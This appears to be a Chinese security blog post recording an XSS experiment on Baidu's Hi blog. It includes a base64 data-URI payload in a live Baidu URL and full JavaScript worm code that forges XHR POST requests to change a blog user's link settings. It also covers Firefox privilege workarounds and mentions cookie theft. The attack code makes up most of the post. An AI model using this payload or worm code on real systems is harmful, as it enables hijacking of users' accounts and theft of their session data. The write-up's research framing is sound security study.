superhei的《Data:_URI_scheme》:http://superhei.blogbus.com/logs/23355141.html。
我拿这个做了下实验:http://hi.baidu.com/xss?jump_url=data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzEyNy4wLjAuMS9iYWlkdS5qcz48L3NjcmlwdD4NCg==,我要验证两个问题,一个是这样进来的XSS威力有多大;一个是我这里提到的想法http://www.0x37.com/post/34.html(《XSS Worm: About XHR POST Form Data》)。
一、XSS Worm: About XHR POST Form Data:
解密上面URL中的base64值得到:<script src=http://127.0.0.1/baidu.js></script>。其中baidu.js的代码如下:
var _x=false;
if(window.XMLHttpRequest){
_x=new XMLHttpRequest();
}else if(window.ActiveXObject){
_x=new ActiveXObject("Msxml2.XMLHTTP");
if(!_x){_x=new ActiveXObject("Microsoft.XMLHTTP");}
}
_1();
function _1(){
src="http://hi.baidu.com/ycosxhack/commit";
argv_1="\r\n";
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ct\"\r\n\r\n";
argv_1+=("9"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"cm\"\r\n\r\n";
argv_1+=("1"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkID\"\r\n\r\n";
argv_1+=("11"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkLabel\"\r\n\r\n";
argv_1+=("%B9%AB%B8%E6"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spRefURL\"\r\n\r\n";
argv_1+=("http%3A%2F%2Fhi.baidu.com%2Fycosxhack%2Fmodify%2Fmylink%2F11"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkName\"\r\n\r\n";
argv_1+=("test"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkURL\"\r\n\r\n";
argv_1+=("http://www.0x37.com/"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkIntro\"\r\n\r\n";
argv_1+=("hi~: 0x37.com"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"spMyLinkSign\"\r\n\r\n";
argv_1+=(""+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5--\r\n";
result=_3or7("POST",src,argv_1);
alert(result);
}
//_2();
function _2(){
src="http://hi.baidu.com/ycosxhack/commit";
ct=9;
cm=1;
spMyLinkID=11;
spMyLinkLabel='%B9%AB%B8%E6';
spRefURL='http%3A%2F%2Fhi.baidu.com%2Fycosxhack%2Fmodify%2Fmylink%2F11';
spMyLinkName='test';
spMyLinkURL='http://www.0x37.com/';
spMyLinkIntro='hi~: 0x37 Security:)';
spMyLinkSign='';
_d="ct="+ct+"&cm="+cm+"&spMyLinkID="+spMyLinkID+"&spMyLinkLabel="+spMyLinkLabel+"&spRefURL="+spRefURL+"&spMyLinkName="+spMyLinkName+"&spMyLinkURL="+spMyLinkU
RL+"&spMyLinkIntro="+spMyLinkIntro+"&spMyLinkSign="+spMyLinkSign;
result=postdata(src,_d);
alert(result);
}
function postdata(_s,_a){
try{netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");}catch(e){alert("Permission UniversalBrowserRead denied.");}
_x.open("POST", _s, false);
_x.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
_x.send(_a);
return _x.responseText;
}
function _3or7(_m,_s,_a){
try{netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");}catch(e){alert("Permission UniversalBrowserRead denied.");}
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","multipart/form-data; boundary=-------------------7964f8dddeb95fc5");
_x.send(_a);
return _x.responseText;
}
_1()函数是multipart/form-data型的表单,而_2()函数是application/x-www-form-urlencoded型的表单(默认)。OK,这次测试发现只有_2()函数执行成功。这就证明了XSS Worm: About XHR POST Form Data的想法。其余的就不多说了。
二、data URI XSS的威力:
不大,盗盗cookie等,如果想用这个来模拟表单的提交过程,就不行了。上面的baidu.js代码在FF下默认是不能执行的。我做这个实验之前先将FF的about:config中的signed.applets.codebase_principal_support设置为true。然后在_x.open之前添加try{netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");}catch(e){alert("Permission UniversalBrowserRead denied.");}。结果测试时会弹出如下对话框:
点击“是”之后,蠕虫代码成功执行。否则的话,会出现如下错误:
这应该是指跨域受限制,权限不足了吧。 |
爱心红客
